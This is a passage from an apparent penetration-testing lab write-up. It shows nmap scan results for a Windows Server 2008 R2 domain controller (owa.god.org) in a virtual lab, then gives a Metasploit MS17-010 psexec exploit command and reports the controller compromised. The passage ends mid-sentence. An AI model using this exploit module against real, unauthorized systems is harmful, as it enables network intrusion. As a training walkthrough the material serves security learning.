Service Info: Host: OWA; OSs: Windows, Windows 98; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_98
Host script results:
|_nbstat: NetBIOS name: OWA, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:5c:30:26 (VMware)
| smb-os-discovery:
| OS: Windows Server 2008 R2 Datacenter 7601 Service Pack 1 (Windows Server 2008 R2 Datacenter 6.1)
| OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
| Computer name: owa
| NetBIOS computer name: OWA
| Domain name: god.org
| Forest name: god.org
| FQDN: owa.god.org
|_ System time: 2020-06-02T09:48:12+08:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
|_smbv2-enabled: Server supports SMBv2 protocol
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 224.61 seconds
Exploitation
use exploit/windows/smb/ms17_010_psexec
The DC is now compromised. This range is simple and suits beginners who have finished DVWA and pikachu and do not want to